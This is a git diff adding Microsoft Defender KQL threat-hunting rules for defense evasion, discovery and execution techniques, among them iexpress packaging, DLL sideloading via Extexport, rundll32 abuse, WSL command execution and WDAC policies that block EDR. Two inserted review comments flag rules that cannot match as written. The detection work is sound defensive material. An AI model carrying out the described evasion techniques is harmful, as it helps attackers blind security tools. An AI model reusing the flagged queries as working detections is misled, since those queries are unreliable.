diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql new file mode 100644 index 00000000..7822f107 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql @@ -0,0 +1,15 @@ +// Title: New Self Extracting Package Created Via IExpress.EXE +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-02-05 +// Level: medium +// Description: Detects the "iexpress.exe" utility creating self-extracting packages. +Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. +Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting +// False Positives: +// - Administrators building packages using iexpress.exe + +DeviceProcessEvents +| where ((FolderPath endswith "\\makecab.exe" or ProcessVersionInfoOriginalFileName =~ "makecab.exe") and InitiatingProcessFolderPath endswith "\\iexpress.exe") or (ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql new file mode 100644 index 00000000..7a55ac05 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql 
@@ -0,0 +1,13 @@ +// Title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet +// Author: frack113 +// Date: 2024-05-03 +// Level: low +// Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting +// False Positives: +// - Administrator script + +DeviceProcessEvents +| where (ProcessCommandLine contains "New-NetFirewallRule " and ProcessCommandLine contains " -Action " and ProcessCommandLine contains "allow") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql new file mode 100644 index 00000000..00bd0c46 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql 
@@ -0,0 +1,12 @@ +// Title: Potential CommandLine Obfuscation Using Unicode Characters +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-01-15 +// Level: medium +// Description: Detects potential CommandLine obfuscation using unicode characters. +Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting + +DeviceProcessEvents +| where ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql new file mode 100644 index 00000000..2f96cedb --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql 
@@ -0,0 +1,13 @@ +// Title: Potential DLL Sideloading Activity Via ExtExport.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-26 +// Level: medium +// Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. +It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". +Arbitrary DLLs can also be loaded if a specific number of flags was provided. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting + +DeviceProcessEvents +| where FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql new file mode 100644 index 00000000..fdebae7b --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql 
@@ -0,0 +1,16 @@ +// Title: Potential Proxy Execution Via Explorer.EXE From Shell Process +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative +// Date: 2020-10-05 +// Level: low +// Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". +Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. +While this is often a legitimate action, this rule can be use to hunt for anomalies. +Muddy Waters threat actor was seeing using this technique. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting +// False Positives: +// - Legitimate explorer.exe run from a shell host like "cmd.exe" or "powershell.exe" + +DeviceProcessEvents +| where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql new file mode 100644 index 00000000..d96fbbb5 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql 
@@ -0,0 +1,14 @@ +// Title: Potential Suspicious Execution From GUID Like Folder Names +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: low +// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. +Use this rule to hunt for potentially suspicious activity stemming from uncommon folders. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting +// False Positives: +// - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not((FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or (FolderPath contains "\\{" and FolderPath contains "}\\") or (FolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql new file mode 100644 index 00000000..08a3a179 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql 
@@ -0,0 +1,15 @@ +// Title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-12-01 +// Level: medium +// Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. +The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. +These can be used for example in decrypting malicious payload for defense evasion. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting +// False Positives: +// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. + +DeviceRegistryEvents +| where RegistryKey contains "\\Shell\\Open\\Command" and (RegistryValueData contains ".AesCryptoServiceProvider" or RegistryValueData contains ".DESCryptoServiceProvider" or RegistryValueData contains ".DSACryptoServiceProvider" or RegistryValueData contains ".RC2CryptoServiceProvider" or RegistryValueData contains ".Rijndael" or RegistryValueData contains ".RSACryptoServiceProvider" or RegistryValueData contains ".TripleDESCryptoServiceProvider") and (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryValueData contains "System.Security.Cryptography." \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql new file mode 100644 index 00000000..7d19e144 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql 
@@ -0,0 +1,14 @@
+// Title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-17
+// Level: medium
+// Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.
+// - Not every instance is considered malicious, but this rule will capture the malicious usages.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "DllRegisterServer" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((ProcessCommandLine contains ":\\Program Files (x86)" or ProcessCommandLine contains ":\\Program Files\\" or ProcessCommandLine contains ":\\Windows\\System32\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
new file mode 100644
index 00000000..6e4e0931
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
@@ -0,0 +1,14 @@
+// Title: Service Binary in User Controlled Folder
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-05-02
+// Level: medium
+// Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
+Attackers often use such directories for staging purposes.
+This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
+Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\AppData\\Roaming\\") and (RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\ImagePath") and (not((RegistryValueData contains "C:\\ProgramData\\Microsoft\\Windows Defender\\" and (RegistryKey endswith "\\Services\\WinDefend*" or RegistryKey contains "\\Services\\MpKs")))) and (not((((RegistryValueData contains "C:\\Users\\" and RegistryValueData contains "AppData\\Local\\Temp\\MBAMInstallerService.exe") and RegistryKey contains "\\Services\\MBAMInstallerService") or (RegistryValueData contains "C:\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe" and RegistryKey contains "\\Services\\ZoomCptService"))))
\ No newline at end of file
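Review bot: `RegistryKey endswith "\\Services*"` and `RegistryKey endswith "\\Services\\WinDefend*"` carry the Sigma wildcard `*` into a KQL string literal, where `endswith` has no wildcard semantics; together with `RegistryKey endswith "\\ImagePath"` the main selection demands two different suffixes at once and is unsatisfiable, so this rule can never return a row. The intended check is presumably a substring test, `RegistryKey contains "\\Services\\"` and `RegistryKey contains "\\Services\\WinDefend"`. The same leaked wildcards appear in Manual Execution of Script Inside of a Compressed File, where `ProcessCommandLine =~ "*\\AppData\\local\\temp\\7z*\*"`, `InitiatingProcessFolderPath =~ "*\\7z*.exe"` and the `contains "\\AppData\\local\\temp*.rar\\"` clauses compare against a literal asterisk (and `\*` is not an escape I know KQL string literals to accept, worth verifying); those need `matches regex` or a split into `contains`/`endswith` clauses. Since it recurs across files, this looks like a converter-level handling of `*` in string modifiers rather than something to patch per rule.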
diff --git a/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql
new file mode 100644
index 00000000..60ecc659
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql
@@ -0,0 +1,10 @@
+// Title: Set Files as System Files Using Attrib.EXE
+// Author: frack113
+// Date: 2022-02-04
+// Level: low
+// Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " +s " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql b/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql
new file mode 100644
index 00000000..b3d1d905
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql
@@ -0,0 +1,10 @@
+// Title: Terminate Linux Process Via Kill
+// Author: Tuan Le (NCSGroup)
+// Date: 2023-03-16
+// Level: medium
+// Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562, detection.threat-hunting
+
+DeviceProcessEvents
+| where FolderPath endswith "/kill" or FolderPath endswith "/killall" or FolderPath endswith "/pkill" or FolderPath endswith "/xkill"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql
new file mode 100644
index 00000000..b5e41b44
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql 
@@ -0,0 +1,19 @@
+// Title: Use Short Name Path in Command Line
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-07
+// Level: medium
+// Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
+Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
+When investigating, examine:
+- Commands using short paths to access sensitive directories or files
+- Web servers on Windows (especially Apache) where short filenames could bypass security controls
+- Correlation with other suspicious behaviors
+- baseline of short name usage in your environment and look for deviations
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting
+// False Positives:
+// - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\")))) and (not(((InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe" or (ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veeam.backup.shell.exe" or (InitiatingProcessFolderPath endswith "\\WebEx\\webexhost.exe" or ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
new file mode 100644
index 00000000..4401f8f5
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
@@ -0,0 +1,13 @@
+// Title: WDAC Policy File Creation In CodeIntegrity Folder
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2025-01-30
+// Level: medium
+// Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting
+// False Positives:
+// - May occur legitimately as part of admin activity, but rarely with interactive elevation.
+
+DeviceFileEvents
+| where InitiatingProcessIntegrityLevel =~ "High" and FolderPath contains ":\\Windows\\System32\\CodeIntegrity\\" and (FolderPath endswith ".cip" or FolderPath endswith ".p7b")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
new file mode 100644
index 00000000..483171eb
--- /dev/null
+++ b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
@@ -0,0 +1,14 @@
+// Title: CMD Shell Output Redirect
+// Author: frack113
+// Date: 2022-01-22
+// Level: low
+// Description: Detects the use of the redirection character ">" to redirect information on the command line.
+This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082, detection.threat-hunting
+// False Positives:
+// - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ">" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")) and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\Internet Download Manager\\IDMMsgHost.exe" or ProcessCommandLine contains "chrome-extension://" or ProcessCommandLine contains "\\.\\pipe\\chrome.nativeMessaging")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql b/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql
new file mode 100644
index 00000000..72b33b7e
--- /dev/null
+++ b/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Net.EXE Execution
+// Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)
+// Date: 2019-01-16
+// Level: low
+// Description: Detects execution of "Net.EXE".
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral-movement, attack.t1021.002, attack.s0039, detection.threat-hunting
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " accounts" or ProcessCommandLine contains " group" or ProcessCommandLine contains " localgroup" or ProcessCommandLine contains " share" or ProcessCommandLine contains " start" or ProcessCommandLine contains " stop " or ProcessCommandLine contains " user" or ProcessCommandLine contains " view") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/process_discovery.kql b/KQL/rules-threat-hunting/Discovery/process_discovery.kql
new file mode 100644
index 00000000..a977aa0f
--- /dev/null
+++ b/KQL/rules-threat-hunting/Discovery/process_discovery.kql
@@ -0,0 +1,14 @@
+// Title: Process Discovery
+// Author: Ömer Günal, oscd.community, CheraaghiMilad
+// Date: 2020-10-06
+// Level: low
+// Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
+Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057, detection.threat-hunting
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/atop" or FolderPath endswith "/htop" or FolderPath endswith "/pgrep" or FolderPath endswith "/ps" or FolderPath endswith "/pstree" or FolderPath endswith "/top"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql b/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql
new file mode 100644
index 00000000..4fc3d766
--- /dev/null
+++ b/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql
@@ -0,0 +1,13 @@
+// Title: SC.EXE Query Execution
+// Author: frack113
+// Date: 2021-12-06
+// Level: low
+// Description: Detects execution of "sc.exe" to query information about registered services on the system
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007, detection.threat-hunting
+// False Positives:
+// - Legitimate query of a service by an administrator to get more information such as the state or PID
+// - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1"
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " query" and (FolderPath endswith "\\sc.exe" and ProcessVersionInfoOriginalFileName =~ "sc.exe")) and (not(ProcessCommandLine =~ "sc query dokan1"))
\ No newline at end of file
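Review bot: The SC.EXE Query Execution selection requires `FolderPath endswith "\\sc.exe" and ProcessVersionInfoOriginalFileName =~ "sc.exe"` to hold together, whereas every other rule in this chunk that pairs an image-path check with an OriginalFileName check (Attrib.EXE, Rundll32, CMD Shell Output Redirect, Net.EXE, Tasklist) joins the two with `or`. If the Sigma source lists them as alternatives, the `and` silently drops renamed copies of sc.exe and any event where one of the two fields is empty. `(FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")` would bring it in line with the sibling rules; please confirm against the source rule before changing it.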
diff --git a/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql b/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql
new file mode 100644
index 00000000..0eba801e
--- /dev/null
+++ b/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Tasklist Discovery Command
+// Author: frack113
+// Date: 2021-12-11
+// Level: informational
+// Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057, detection.threat-hunting
+// False Positives:
+// - Likely from users, administrator and different internal and third party applications.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "tasklist" or FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
new file mode 100644
index 00000000..421a4caf
--- /dev/null
+++ b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
@@ -0,0 +1,15 @@
+// Title: System Information Discovery Via Wmic.EXE
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-19
+// Level: low
+// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
+and GPU driver products/versions.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082, detection.threat-hunting
+// False Positives:
+// - VMWare Tools serviceDiscovery scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "caption" or ProcessCommandLine contains "command" or ProcessCommandLine contains "driverversion" or ProcessCommandLine contains "maxcapacity" or ProcessCommandLine contains "name" or ProcessCommandLine contains "osarchitecture" or ProcessCommandLine contains "product" or ProcessCommandLine contains "size" or ProcessCommandLine contains "smbiosbiosversion" or ProcessCommandLine contains "version" or ProcessCommandLine contains "videomodedescription") and (ProcessCommandLine contains "baseboard" or ProcessCommandLine contains "bios" or ProcessCommandLine contains "cpu" or ProcessCommandLine contains "diskdrive" or ProcessCommandLine contains "logicaldisk" or ProcessCommandLine contains "memphysical" or ProcessCommandLine contains "os" or ProcessCommandLine contains "path" or ProcessCommandLine contains "startup" or ProcessCommandLine contains "win32_videocontroller") and ProcessCommandLine contains "get" and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")) and (not(InitiatingProcessCommandLine contains "\\VMware\\VMware Tools\\serviceDiscovery\\scripts\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
new file mode 100644
index 00000000..19469938
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
@@ -0,0 +1,14 @@
+// Title: Arbitrary Command Execution Using WSL
+// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting
+// False Positives:
+// - Automation and orchestration scripts may use this method to execute scripts etc.
+// - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql
new file mode 100644
index 00000000..bfb6db93
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql
@@ -0,0 +1,13 @@
+// Title: Cab File Extraction Via Wusa.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-04
+// Level: medium
+// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql b/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql
new file mode 100644
index 00000000..18fcca0b
--- /dev/null
+++ b/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql
@@ -0,0 +1,12 @@
+// Title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\" and InitiatingProcessFolderPath endswith "\\dfsvc.exe"
